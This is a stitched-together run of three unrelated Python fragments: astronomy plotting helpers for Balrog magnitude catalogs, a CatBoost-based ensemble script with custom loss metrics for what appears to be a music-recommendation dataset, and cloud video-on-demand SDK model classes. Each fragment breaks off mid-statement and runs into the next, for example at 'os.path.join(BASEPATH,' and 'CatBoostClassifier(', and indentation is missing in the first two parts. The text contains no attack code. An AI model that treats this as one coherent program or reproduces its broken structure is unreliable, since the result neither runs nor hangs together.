plotter(mag_hdr1=mag_hdr1, mag_hdr2=mag_hdr2, cbar_val=cbar_val, plot_title=plot_title, error1=err1, error2=err2, filter_name=f, full_magnitude1=fullmag1, clean_magnitude1=cleanmag1, clean_magnitude2=cleanmag2, mag_axlabel1=mag_axlabel1, mag_axlabel2=mag_axlabel2, realization_number=realization_number, tile_name=tile_name, idx_list=cbar_idx_list, bins=cbar_bins, cbar_axlabel=cbar_axlabel, plot_name=plot_name)
counter_subplot += 1
if SUBPLOT:
### Show or save the plot once all four subplots have been filled ###
plt.subplots_adjust(hspace=0.4)
plt.subplots_adjust(wspace=0.3)
plt.tight_layout(pad=3, h_pad=2.5)
### Title ###
plt.suptitle(plot_title)
### Save plot ###
if SAVE_PLOT:
print '-----> Saving plot as: ', plot_name
plt.savefig(plot_name)
### Show plot ###
if SHOW_PLOT:
plt.show()
return flag_idx
def get_plot_suptitle(realization_number, tile_name):
"""Generate plot title.
Args:
match_type (str) -- Ex: inj_mof_vs_truth_cat
realization_number (str) -- Allowed values: '0' '1' '2' ... 'stacked'.
tile_name (str)
Returns:
title (str) -- Ex: 'Inj MOF Cat & Truth Cat'
"""
title = str(TITLE_PIECE1) + ' & ' + str(TITLE_PIECE2) +'. Tile: ' + str(tile_name) + '. Realization: ' + str(realization_number) + '.'
if RUN_TYPE == 'ok':
title = title + ' Unchanged FOF groups.'
if RUN_TYPE == 'rerun':
title = title + ' Changed FOF groups.'
if NORMALIZE:
title = 'Normalized. ' + title
return title
def get_plot_save_name(realization_number, tile_name):
"""Generate name of the plot that will be used in plt.savefig().
Relies on directory structure: outdir/plots/`BALROG_RUN`/`MATCH_TYPE`/{tile}/{plot_type}/{realization}/ where allowed values for plot_type are: 'normalized' 'scatter'.
Args:
outdir (str) -- Output directory
realization_number (str) -- Allowed values: '0' '1' '2' 'stacked'
tile_name (str)
Returns:
fn (str) -- The complete filename which includes path.
"""
### Get filename ###
if YLOW is None and YHIGH is None:
# Default scale for the vertical axis (vax) is used #
ylim = 'defaultvax'
if YLOW is not None and YHIGH is not None:
ylim = str(YLOW)+'y'+str(YHIGH)
if RUN_TYPE is None:
endname = str(tile_name) + '_' + str(realization_number) + '_griz_' + str(MATCH_TYPE) + '_' + str(ylim) + '.png'
if RUN_TYPE is not None:
endname = str(tile_name) + '_' + str(realization_number) + '_griz_' + str(MATCH_TYPE) + '_' + str(RUN_TYPE) + '_' + str(ylim) + '.png'
# dm = delta magnitude #
if CM_T_S2N_COLORBAR:
outname = 'm_vs_dm_cm_t_s2n_' + endname
if CM_T_COLORBAR:
outname = 'm_vs_dm_cm_t_' + endname
if CM_T_ERR_COLORBAR:
outname = 'm_vs_dm_cm_t_err_' + endname
if HEXBIN:
outname = 'm_vs_dm_hexbin_' + endname
if CM_T_S2N_COLORBAR is False and CM_T_COLORBAR is False and CM_T_ERR_COLORBAR is False and HEXBIN is False:
outname = 'm_vs_dm_' + endname
# !!!!! User may wish to edit directory structure #
### Check for directory existence ###
if RUN_TYPE is not None:
plot_dir_pref = os.path.join(OUTDIR, 'plots', BALROG_RUN, MATCH_TYPE, tile_name, realization_number, 'fof_analysis')
if RUN_TYPE is None:
plot_dir_pref = os.path.join(OUTDIR, 'plots', BALROG_RUN, MATCH_TYPE, tile_name, realization_number)
if NORMALIZE:
plot_dir = os.path.join(plot_dir_pref, 'normalized')
if NORMALIZE is False:
plot_dir = os.path.join(plot_dir_pref, 'scatter')
if os.path.isdir(plot_dir) is False:
if NO_DIR_EXIT:
sys.exit('Directory ' + str(plot_dir) + ' does not exist. \n Change directory structure in ms_plotter.get_plot_save_name() or set `NO_DIR_MAKE=True`')
if NO_DIR_MAKE:
print 'Making directory ', plot_dir, '...\n'
os.makedirs(plot_dir)
### Get filename and path ###
if NORMALIZE:
fn = os.path.join(plot_dir, 'norm_' + str(outname))
if NORMALIZE is False:
fn = os.path.join(plot_dir, outname)
return fn
def get_coadd_mag_and_mag_err(fn_g, fn_r, fn_i, fn_z, mag_hdr, err_hdr):
"""Solely for use with coadd catalogs. Creates a list of magnitudes of form '(mag_g, mag_r, mag_i, mag_z)' from four catalogs.
Args:
fn -- Filenames. Must be FITS files.
hdr (str) -- Header for the magnitude. Headers refer to columns in the matched catalog.
Returns:
m_griz (list of str) -- Stores magnitude of each filter in form '(mag_g, mag_r, mag_i, mag_z)'
m_err_griz (list of str) -- Stores error in magnitude of each filter in form '(mag_g, mag_r, mag_i, mag_z)'
"""
# Files have not yet been matched, and do not have hdr_1 #
mag_hdr = mag_hdr[:-2]
err_hdr = err_hdr[:-2]
# Open FITS files #
hdu_g = fits.open(fn_g); hdu_r = fits.open(fn_r); hdu_i = fits.open(fn_i); hdu_z = fits.open(fn_z)
# Read data #
data_g = hdu_g[1].data; data_r = hdu_r[1].data; data_i = hdu_i[1].data; data_z = hdu_z[1].data
# Get magnitudes #
m_g = data_g[mag_hdr]; m_r = data_r[mag_hdr]; m_i = data_i[mag_hdr]; m_z = data_z[mag_hdr]
# Get magnitude errors #
err_g = data_g[err_hdr]; err_r = data_r[err_hdr]; err_i = data_i[err_hdr]; err_z = data_z[err_hdr]
m_griz, m_err_griz = [], []
for i in np.arange(0, len(m_g)):
m_griz.append("'("+ str(m_g[i]) + ', ' + str(m_r[i]) + ', ' + str(m_i[i]) + ', ' + str(m_z[i]) + ")'")
m_err_griz.append("'("+ str(err_g[i])+ ', ' + str(err_r[i])+ ', ' + str(err_i[i]) + ', ' + str(err_z[i]) + ")'")
return m_griz, m_err_griz
def get_star_mag(df):
"""Solely for use with star truth catalogs. Computes and creates a list of magnitudes of form '(mag_g, mag_r, mag_i, mag_z)'.
Args:
        df (pandas DataFrame)
Returns:
m_griz (list of str) -- Stores magnitudes of each filter in form '(mag_g, mag_r, mag_i, mag_z)'.
"""
m_g = df['g_Corr_1']
m_r = df['g_Corr_1'] - df['gr_Corr_1']
m_i = df['g_Corr_1'] - df['gr_Corr_1'] - df['ri_Corr_1']
m_z = df['g_Corr_1'] - df['gr_Corr_1'] - df['ri_Corr_1'] - df['iz_Corr_1']
m_griz = []
for i in np.arange(0, len(m_g)):
m_griz.append("'("+ str(m_g[i]) + ', ' + str(m_r[i]) + ', ' + str(m_i[i]) + ', ' + str(m_z[i]) + ")'")
return m_griz
def get_catalog(cat_type, inj, realization_number, tile_name, filter_name):
"""Get catalog to analyze.
Args:
cat_type -- Catalog type. Allowed values: 'gal_truth', 'mof', 'star_truth', 'sof', 'coadd'.
inj (bool)
realization_number (str) -- Allowed values: '0' '1' '2' ...
tile_name -- Different allowed values depending on catalog.
filter_name (str) -- Only used with coadd catalogs.
Returns:
fn -- Filename
"""
if cat_type == 'gal_truth' and inj:
        fn = os.path.join(BASEPATH,
from __future__ import division
import pandas as pd
import numpy as np
from sklearn import metrics
from sklearn.metrics import roc_auc_score
import datetime as dt
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.metrics import f1_score
from catboost import Pool, CatBoostClassifier
import math
from pyearth import Earth
from sklearn import linear_model
from FileManager import FileManager
from simple_lgbm import lgbmodel
from simple_lgbm import getDataB, getPrepDataB
from problogic import getPrepDataC, probpredict
le = LabelEncoder()
def auc(x, y):
return abs( np.trapz(y, x) )
class AUClossMetric(object):
def get_final_error(self, error, weight):
return error / (weight + 1e-38)
def is_max_optimal(self):
return True
def evaluate(self, approxes, target, weight):
# approxes is list of indexed containers (containers with only __len__ and __getitem__ defined), one container
# per approx dimension. Each container contains floats.
# weight is one dimensional indexed container.
# target is float.
# weight parameter can be None.
# Returns pair (error, weights sum)
approx = approxes[0]
weight_sum = 1.0
error_sum = auc( target, approx )
return error_sum, weight_sum
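# Hedged usage sketch: CatBoost accepts a user-defined eval metric object
# exposing exactly this get_final_error/is_max_optimal/evaluate interface,
# which is how crossEnsembleValidationCustom() below wires these classes in:
#
#   model = CatBoostClassifier(eval_metric=AUClossMetric())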
class HingelossMetric(object):
def get_final_error(self, error, weight):
return error / (weight + 1e-38)
def is_max_optimal(self):
return True
def evaluate(self, approxes, target, weight):
# approxes is list of indexed containers (containers with only __len__ and __getitem__ defined), one container
# per approx dimension. Each container contains floats.
# weight is one dimensional indexed container.
# target is float.
# weight parameter can be None.
# Returns pair (error, weights sum)
assert len(approxes) == 1
assert len(target) == len(approxes[0])
approx = approxes[0]
error_sum = 0.0
weight_sum = 0.0
for i in xrange(len(approx)):
w = 1.0 if weight is None else weight[i]
weight_sum += w
error_sum += max ( 0, ( 1 - (target[i] * approx[i]) ) )
return error_sum, weight_sum
class SquaredlossMetric(object):
def get_final_error(self, error, weight):
return error / (weight + 1e-38)
def is_max_optimal(self):
return True
def evaluate(self, approxes, target, weight):
# approxes is list of indexed containers (containers with only __len__ and __getitem__ defined), one container
# per approx dimension. Each container contains floats.
# weight is one dimensional indexed container.
# target is float.
# weight parameter can be None.
# Returns pair (error, weights sum)
assert len(approxes) == 1
assert len(target) == len(approxes[0])
approx = approxes[0]
error_sum = 0.0
weight_sum = 0.0
for i in xrange(len(approx)):
w = 1.0 if weight is None else weight[i]
weight_sum += w
error_sum += ( 1 - (target[i] * approx[i]) )**2
return error_sum, weight_sum
class LogisticMetric(object):
def get_final_error(self, error, weight):
return error / (weight + 1e-38)
def is_max_optimal(self):
return True
def evaluate(self, approxes, target, weight):
# approxes is list of indexed containers (containers with only __len__ and __getitem__ defined), one container
# per approx dimension. Each container contains floats.
# weight is one dimensional indexed container.
# target is float.
# weight parameter can be None.
# Returns pair (error, weights sum)
assert len(approxes) == 1
assert len(target) == len(approxes[0])
approx = approxes[0]
error_sum = 0.0
weight_sum = 0.0
for i in xrange(len(approx)):
w = 1.0 if weight is None else weight[i]
weight_sum += w
error_sum += math.log( 1 + math.exp (-1 * target[i] * approx[i]) )
error_sum = error_sum / math.log(2)
return error_sum, weight_sum
def gini(actual, pred, cmpcol=0, sortcol=1):
assert (len(actual) == len(pred))
all = np.asarray(np.c_[actual, pred, np.arange(len(actual))], dtype=np.float)
all = all[np.lexsort((all[:, 2], -1 * all[:, 1]))]
totalLosses = all[:, 0].sum()
giniSum = all[:, 0].cumsum().sum() / totalLosses
giniSum -= (len(actual) + 1) / 2.
return giniSum / len(actual)
def gini_normalized(a, p):
return gini(a, p) / gini(a, a)
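# Quick sanity check (illustrative): a prediction that ranks the actuals
# perfectly normalizes to 1.0, since gini(a, p) then equals gini(a, a):
#
#   gini_normalized([0, 0, 1, 1], [0.1, 0.2, 0.8, 0.9])  # -> 1.0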
class GiniMetric(object):
def get_final_error(self, error, weight):
return error / (weight + 1e-38)
def is_max_optimal(self):
return True
def evaluate(self, approxes, target, weight):
# approxes is list of indexed containers (containers with only __len__ and __getitem__ defined), one container
# per approx dimension. Each container contains floats.
# weight is one dimensional indexed container.
# target is float.
# weight parameter can be None.
# Returns pair (error, weights sum)
assert len(approxes) == 1
assert len(target) == len(approxes[0])
approx = approxes[0]
error_sum = 0.0
weight_sum = 1.0
error_sum = gini_normalized(target, approx)
return error_sum, weight_sum
def AUC(y, pred):
auc = roc_auc_score(y, pred)
return auc
def crossValidation (model, X, y, nfolds = 5 ):
nrow, ncol = X.shape
meanSize = nrow // nfolds
y = y.to_frame()
score = 0.0
meanlist = []
dataindex = []
for ind in range (0, nfolds):
start, end = ind * meanSize, (ind+1) * meanSize
dataindex.append ( (start, end) )
for ind, curind in enumerate (dataindex):
start, end = curind
nextind = ind + 1
Xcur, ycur = X.iloc[start:end, :], y[start:end]
model.fit(Xcur, ycur)
#get test
if nextind < len(dataindex):
tstart, tend = dataindex[nextind]
Xtcur, ytcur = X.iloc[tstart:tend, :], y.iloc[tstart:tend, :]
ypred = model.predict(Xtcur)
ypred = ypred.reshape( (1, len(ypred) ) )
#ytcur = ytcur.reshape( (1, len(ytcur) ) )
ypred = ypred.T
ytcur = ytcur.values
#print ytcur.shape, ypred.shape
#print type (ytcur), type( ypred )
#nmlist = ytcur.tolist()
#score = AUC( ytcur, ypred )
score = f1_score( ytcur.astype(int), ypred.astype(int), average='macro')
meanlist.append ( score )
return sum (meanlist) / len (meanlist)
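# Note on the fold scheme above: fold i is used for training and fold i + 1
# for scoring (forward chaining), so the final fold is train-only and the
# mean is taken over nfolds - 1 scores rather than nfolds.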
def crossEnsembleValidation ( X, y, nfolds = 5, loss_function='Logloss' ):
#model = CatBoostClassifier ( iterations=400, loss_function='AUC' )
model = CatBoostClassifier( loss_function=loss_function )
nrow, ncol = X.shape
meanSize = nrow // nfolds
y = pd.to_numeric(y).tolist()
score = 0.0
meanlist = []
dataindex = []
for ind in range (0, nfolds):
start, end = ind * meanSize, (ind+1) * meanSize
dataindex.append ( (start, end) )
for ind, curind in enumerate (dataindex):
start, end = curind
nextind = ind + 1
Xcur, ycur = X[start:end], y[start:end]
model.fit(Xcur, ycur)
#get test
if nextind < len(dataindex):
tstart, tend = dataindex[nextind]
Xtcur, ytcur = X[tstart:tend], y[tstart:tend]
ypred = model.predict(Xtcur)
ypred = ypred.reshape( (1, len(ypred) ) )
ypred = ypred.T
#score = AUC( ytcur, ypred )
score = f1_score( ytcur, ypred, average='macro')
meanlist.append ( score )
return sum (meanlist) / len (meanlist)
def crossEnsembleValidationCustom ( X, y, nfolds = 5, eval_metric=None ):
model = CatBoostClassifier( eval_metric=eval_metric )
nrow, ncol = X.shape
meanSize = nrow // nfolds
y = pd.to_numeric(y).tolist()
score = 0.0
meanlist = []
dataindex = []
for ind in range (0, nfolds):
start, end = ind * meanSize, (ind+1) * meanSize
dataindex.append ( (start, end) )
for ind, curind in enumerate (dataindex):
start, end = curind
nextind = ind + 1
Xcur, ycur = X[start:end], y[start:end]
model.fit(Xcur, ycur)
#get test
if nextind < len(dataindex):
tstart, tend = dataindex[nextind]
Xtcur, ytcur = X[tstart:tend], y[tstart:tend]
ypred = model.predict(Xtcur)
ypred = ypred.reshape( (1, len(ypred) ) )
ypred = ypred.T
#score = AUC( ytcur, ypred )
score = f1_score( ytcur, ypred, average='macro')
meanlist.append ( score )
return sum (meanlist) / len (meanlist)
def label(df,var):
for i in var:
df[i]= le.fit_transform(df[i])
def date_feature(df):
var = ['registration_init_time','expiration_date']
k = ['reg','exp']
df['sub_duration'] = (df[var[1]] - df[var[0]]).dt.days
for i ,j in zip(var,k):
df[j+'_day'] = df[i].dt.day
df[j+'_weekday'] = df[i].dt.weekday
df[j+'_week'] = df[i].dt.week
df[j+'_month'] = df[i].dt.month
df[j+'_year'] =df[i].dt.year
def getDataA():
#Load data set
data_path = 'input/'
train = pd.read_csv(data_path + 'train.csv',dtype=({'msno':'category','song_id':'category', 'source_system_tab':'category',
'source_screen_name':'category','source_type':'category','target':'category'}))
test = pd.read_csv(data_path + 'test.csv',dtype=({'msno':'category','song_id':'category', 'source_system_tab':'category',
'source_screen_name':'category','source_type':'category'}))
members = pd.read_csv(data_path + 'members.csv',parse_dates=['registration_init_time','expiration_date'],dtype=({'msno':'category','gender':'category'}))
songs = pd.read_csv(data_path + 'songs.csv',dtype=({'song_id':'category','genre_ids':'category','artist_name':'category',
'composer':'category','lyricist':'category','language':'category'}))
df_train = train.merge(members,how='left',on='msno')
df_test = test.merge(members,how='left',on='msno')
df_train = df_train.merge(songs,how='left',on='song_id')
df_test = df_test.merge(songs, how='left',on='song_id')
del train,test,members,songs
cat = ['source_system_tab','source_screen_name','source_type', 'gender',
'genre_ids','artist_name','composer','lyricist','song_length','language']
def missing(df,var):
for i in var:
df[i].fillna(df[i].mode()[0], inplace=True)
missing(df_train,cat)
missing(df_test,cat)
date_feature(df_train)
date_feature(df_test)
#le = LabelEncoder()
cat = ['msno', 'song_id', 'source_system_tab', 'source_screen_name',
'source_type','gender','genre_ids','artist_name','composer',
'lyricist']
label(df_train,cat)
label(df_test,cat)
lstSet = set( ['target','registration_init_time', 'expiration_date'] )
train_cols = set (df_train.columns) - lstSet
train_cols = list (train_cols )
X = df_train[train_cols]
y = df_train['target'].apply(pd.to_numeric, errors='coerce')
lstSet = set( ['id','registration_init_time', 'expiration_date'] )
test_cols = set (df_test.columns) - lstSet
test_cols = list ( test_cols )
x_test = df_test[test_cols]
#return X, y, x_test, df_test
return X, y, x_test
def buildlevel1 ( data ):
seed = 23
modellst = []
filename = "level1Ensemble.pkl"
fObject = FileManager(filename)
if not fObject.isExist( ):
X, y = data['type1']['x'], data['type1']['y']
###add catboost here
        model = CatBoostClassifier(
        :param ObjectLibrary: Object library selection. Valid values:
<li>Default: use the default object library;</li>
<li>UserDefine: use the user-defined object library;</li>
<li>All: use both the default and the user-defined object libraries.</li>
        :type ObjectLibrary: str
        """
        self.Switch = None
        self.ObjectLibrary = None
    def _deserialize(self, params):
        self.Switch = params.get("Switch")
        self.ObjectLibrary = params.get("ObjectLibrary")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class OcrFullTextConfigureInfo(AbstractModel):
    """Control parameters for the full-text recognition task
    """
    def __init__(self):
        """
        :param Switch: Switch of the full-text recognition task. Valid values:
<li>ON: enables the intelligent full-text recognition task;</li>
<li>OFF: disables the intelligent full-text recognition task.</li>
        :type Switch: str
        """
        self.Switch = None
    def _deserialize(self, params):
        self.Switch = params.get("Switch")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class OcrFullTextConfigureInfoForUpdate(AbstractModel):
    """Control parameters for the full-text recognition task
    """
    def __init__(self):
        """
        :param Switch: Switch of the full-text recognition task. Valid values:
<li>ON: enables the intelligent full-text recognition task;</li>
<li>OFF: disables the intelligent full-text recognition task.</li>
        :type Switch: str
        """
        self.Switch = None
    def _deserialize(self, params):
        self.Switch = params.get("Switch")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class OcrWordsConfigureInfo(AbstractModel):
    """Control parameters for text keyword recognition.
    """
    def __init__(self):
        """
        :param Switch: Switch of the text keyword recognition task. Valid values:
<li>ON: enables the text keyword recognition task;</li>
<li>OFF: disables the text keyword recognition task.</li>
        :type Switch: str
        :param LabelSet: Keyword filter tags, which specify the tags of the keywords to return. If this parameter is left unset or empty, all results are returned.
Up to 10 tags are allowed, each of which can contain up to 16 characters.
        :type LabelSet: list of str
        """
        self.Switch = None
        self.LabelSet = None
    def _deserialize(self, params):
        self.Switch = params.get("Switch")
        self.LabelSet = params.get("LabelSet")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class OcrWordsConfigureInfoForUpdate(AbstractModel):
    """Control parameters for text keyword recognition.
    """
    def __init__(self):
        """
        :param Switch: Switch of the text keyword recognition task. Valid values:
<li>ON: enables the text keyword recognition task;</li>
<li>OFF: disables the text keyword recognition task.</li>
        :type Switch: str
        :param LabelSet: Keyword filter tags, which specify the tags of the keywords to return. If this parameter is left unset or empty, all results are returned.
Up to 10 tags are allowed, each of which can contain up to 16 characters.
        :type LabelSet: list of str
        """
        self.Switch = None
        self.LabelSet = None
    def _deserialize(self, params):
        self.Switch = params.get("Switch")
        self.LabelSet = params.get("LabelSet")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class OutputAudioStream(AbstractModel):
    """Information of an output audio stream
    """
    def __init__(self):
        """
        :param Codec: Codec of the audio stream. Valid value:
<li>libfdk_aac: suitable for mp4 files.</li>
Default value: libfdk_aac.
        :type Codec: str
        :param SampleRate: Sample rate of the audio stream. Valid values:
<li>16000</li>
<li>32000</li>
<li>44100</li>
<li>48000</li>
Unit: Hz.
Default value: 16000.
        :type SampleRate: int
        :param AudioChannel: Number of sound channels. Valid values:
<li>1: mono;</li>
<li>2: stereo.</li>
Default value: 2.
        :type AudioChannel: int
        """
        self.Codec = None
        self.SampleRate = None
        self.AudioChannel = None
    def _deserialize(self, params):
        self.Codec = params.get("Codec")
        self.SampleRate = params.get("SampleRate")
        self.AudioChannel = params.get("AudioChannel")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class OutputVideoStream(AbstractModel):
    """Information of an output video stream
    """
    def __init__(self):
        """
        :param Codec: Codec of the video stream. Valid value:
<li>libx264: H.264 encoding.</li>
Default value: libx264.
        :type Codec: str
        :param Fps: Video frame rate. Value range: [0, 60], in Hz.
Default value: 0, meaning the frame rate matches that of the first video segment in the first video track.
        :type Fps: int
        """
        self.Codec = None
        self.Fps = None
    def _deserialize(self, params):
        self.Codec = params.get("Codec")
        self.Fps = params.get("Fps")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class ParseStreamingManifestRequest(AbstractModel):
    """ParseStreamingManifest request structure
    """
    def __init__(self):
        """
        :param MediaManifestContent: Content of the index file to be parsed.
        :type MediaManifestContent: str
        :param ManifestType: Format of the video index file. Default: m3u8. Valid values:
<li>m3u8</li>
<li>mpd</li>
        :type ManifestType: str
        """
        self.MediaManifestContent = None
        self.ManifestType = None
    def _deserialize(self, params):
        self.MediaManifestContent = params.get("MediaManifestContent")
        self.ManifestType = params.get("ManifestType")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class ParseStreamingManifestResponse(AbstractModel):
    """ParseStreamingManifest response structure
    """
    def __init__(self):
        """
        :param MediaSegmentSet: List of segment files.
        :type MediaSegmentSet: list of str
        :param RequestId: Unique request ID, which is returned with every request. The RequestId must be provided when locating a problem with the request.
        :type RequestId: str
        """
        self.MediaSegmentSet = None
        self.RequestId = None
    def _deserialize(self, params):
        self.MediaSegmentSet = params.get("MediaSegmentSet")
        self.RequestId = params.get("RequestId")
class PlayStatFileInfo(AbstractModel):
    """Information of a playback statistics file
    """
    def __init__(self):
        """
        :param Date: Date to which the playback statistics belong, in [ISO date format](https://cloud.tencent.com/document/product/266/11732#I).
        :type Date: str
        :param Url: URL of the playback statistics file. The file contains:
<li> date: playback date;</li>
<li> file_id: video file ID;</li>
<li> ip_count: number of deduplicated client IPs;</li>
<li> flux: playback traffic, in bytes;</li>
<li> play_times: total number of plays;</li>
<li> pc_play_times: number of plays on PC;</li>
<li> mobile_play_times: number of plays on mobile devices;</li>
<li> iphone_play_times: number of plays on iPhone;</li>
<li> android_play_times: number of plays on Android;</li>
<li> host_name: domain name.</li>
        :type Url: str
        """
        self.Date = None
        self.Url = None
    def _deserialize(self, params):
        self.Date = params.get("Date")
        self.Url = params.get("Url")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class PlayerConfig(AbstractModel):
    """Player configuration details
    """
    def __init__(self):
        """
        :param Name: Player configuration name.
        :type Name: str
        :param Type: Player configuration type. Valid values:
<li>Preset: preset configuration;</li>
<li>Custom: custom configuration.</li>
        :type Type: str
        :param DrmSwitch: Switch for playing back DRM-protected adaptive bitrate streams:
<li>ON: enabled; only adaptive bitrate stream outputs protected by DRM are played;</li>
<li>OFF: disabled; unencrypted adaptive bitrate stream outputs are played.</li>
        :type DrmSwitch: str
        :param AdaptiveDynamicStreamingDefinition: ID of the unencrypted adaptive bitrate streaming template allowed for output.
        :type AdaptiveDynamicStreamingDefinition: int
        :param DrmStreamingsInfo: Content of the DRM-protected adaptive bitrate streaming templates allowed for output.
Note: this field may return null, indicating that no valid value was obtained.
        :type DrmStreamingsInfo: :class:`tencentcloud.vod.v20180717.models.DrmStreamingsInfo`
        :param ImageSpriteDefinition: ID of the image sprite template allowed for output.
        :type ImageSpriteDefinition: int
        :param ResolutionNameSet: Display names used by the player for substreams of different resolutions.
        :type ResolutionNameSet: list of ResolutionNameInfo
        :param CreateTime: Creation time of the player configuration, in [ISO date format](https://cloud.tencent.com/document/product/266/11732#iso-.E6.97.A5.E6.9C.9F.E6.A0.BC.E5.BC.8F).
        :type CreateTime: str
        :param UpdateTime: Last modification time of the player configuration, in [ISO date format](https://cloud.tencent.com/document/product/266/11732#iso-.E6.97.A5.E6.9C.9F.E6.A0.BC.E5.BC.8F).
        :type UpdateTime: str
        :param Domain: Domain name used for playback. A value of Default means the domain name in the [default distribution configuration](https://cloud.tencent.com/document/product/266/33373) is used.
        :type Domain: str
        :param Scheme: Scheme used for playback. Valid values:
<li>Default: the scheme in the [default distribution configuration](https://cloud.tencent.com/document/product/266/33373) is used;</li>
<li>HTTP;</li>
<li>HTTPS.</li>
        :type Scheme: str
        :param Comment: Template description.
        :type Comment: str
        """
        self.Name = None
        self.Type = None
        self.DrmSwitch = None
        self.AdaptiveDynamicStreamingDefinition = None
        self.DrmStreamingsInfo = None
        self.ImageSpriteDefinition = None
        self.ResolutionNameSet = None
        self.CreateTime = None
        self.UpdateTime = None
        self.Domain = None
        self.Scheme = None
        self.Comment = None
    def _deserialize(self, params):
        self.Name = params.get("Name")
        self.Type = params.get("Type")
        self.DrmSwitch = params.get("DrmSwitch")
        self.AdaptiveDynamicStreamingDefinition = params.get("AdaptiveDynamicStreamingDefinition")
        if params.get("DrmStreamingsInfo") is not None:
            self.DrmStreamingsInfo = DrmStreamingsInfo()
            self.DrmStreamingsInfo._deserialize(params.get("DrmStreamingsInfo"))
        self.ImageSpriteDefinition = params.get("ImageSpriteDefinition")
        if params.get("ResolutionNameSet") is not None:
            self.ResolutionNameSet = []
            for item in params.get("ResolutionNameSet"):
                obj = ResolutionNameInfo()
                obj._deserialize(item)
                self.ResolutionNameSet.append(obj)
        self.CreateTime = params.get("CreateTime")
        self.UpdateTime = params.get("UpdateTime")
        self.Domain = params.get("Domain")
        self.Scheme = params.get("Scheme")
        self.Comment = params.get("Comment")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class PoliticalAsrReviewTemplateInfo(AbstractModel):
    """Control parameters for ASR-based detection of politically sensitive information
    """
    def __init__(self):
        """
        :param Switch: Switch of the ASR-based politically sensitive information detection task. Valid values:
<li>ON: enables the task;</li>
<li>OFF: disables the task.</li>
        :type Switch: str
        :param BlockConfidence: Score threshold for a suspected violation. If intelligent review reaches this score or higher, the content is deemed a suspected violation. Defaults to 100 if left unset. Value range: 0-100.
        :type BlockConfidence: int
        :param ReviewConfidence: Score threshold at or above which human review is deemed necessary. Defaults to 75 if left unset. Value range: 0-100.
        :type ReviewConfidence: int
        """
        self.Switch = None
        self.BlockConfidence = None
        self.ReviewConfidence = None
    def _deserialize(self, params):
        self.Switch = params.get("Switch")
        self.BlockConfidence = params.get("BlockConfidence")
        self.ReviewConfidence = params.get("ReviewConfidence")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class PoliticalAsrReviewTemplateInfoForUpdate(AbstractModel):
    """Control parameters for ASR-based detection of politically sensitive information.
    """
    def __init__(self):
        """
        :param Switch: Switch of the ASR-based politically sensitive information detection task. Valid values:
<li>ON: enables the task;</li>
<li>OFF: disables the task.</li>
        :type Switch: str
        :param BlockConfidence: Score threshold for a suspected violation. If intelligent review reaches this score or higher, the content is deemed a suspected violation. Value range: 0-100.
        :type BlockConfidence: int
        :param ReviewConfidence: Score threshold at or above which human review is deemed necessary. Value range: 0-100.
        :type ReviewConfidence: int
        """
        self.Switch = None
        self.BlockConfidence = None
        self.ReviewConfidence = None
    def _deserialize(self, params):
        self.Switch = params.get("Switch")
        self.BlockConfidence = params.get("BlockConfidence")
        self.ReviewConfidence = params.get("ReviewConfidence")
        member_set = set(params.keys())
        for name, value in vars(self).items():
            if name in member_set:
                member_set.remove(name)
        if len(member_set) > 0:
            warnings.warn("%s fields are useless." % ",".join(member_set))
class PoliticalConfigureInfo(AbstractModel):
    """Control parameters for detection of politically sensitive information
    """
    def __init__(self):
        """
        :param ImgReviewInfo: Control parameters for detecting politically sensitive information in images.
Note: this field may return null, indicating that no valid value was obtained.
        :type ImgReviewInfo: :class:`tencentcloud.vod.v20180717.models.PoliticalImgReviewTemplateInfo`
        :param AsrReviewInfo: Control parameters for ASR-based detection of politically sensitive information.
Note: this field may return null, indicating that no valid value was obtained.
        :type AsrReviewInfo: :class:`tencentcloud.vod.v20180717.models.PoliticalAsrReviewTemplateInfo`
        :param OcrReviewInfo: Control parameters for OCR-based detection of politically sensitive information.
Note: this field may return null, indicating that no valid value was obtained.
        :type OcrReviewInfo: :class:`tencentcloud.vod.v20180717.models.PoliticalOcrReviewTemplateInfo`
        """
        self.ImgReviewInfo = None
        self.AsrReviewInfo = None
        self.OcrReviewInfo = None
    def _deserialize(self, params):
        if params.get("ImgReviewInfo") is not None:
            self.ImgReviewInfo = PoliticalImgReviewTemplateInfo()
            self.ImgReviewInfo._deserialize(params.get("ImgReviewInfo"))
        if params.get("AsrReviewInfo") is not None:
            self.AsrReviewInfo = PoliticalAsrReviewTemplateInfo()
            self.AsrReviewInfo._deserialize(params.get("AsrReviewInfo"))
        if params.get("OcrReviewInfo") is not None:
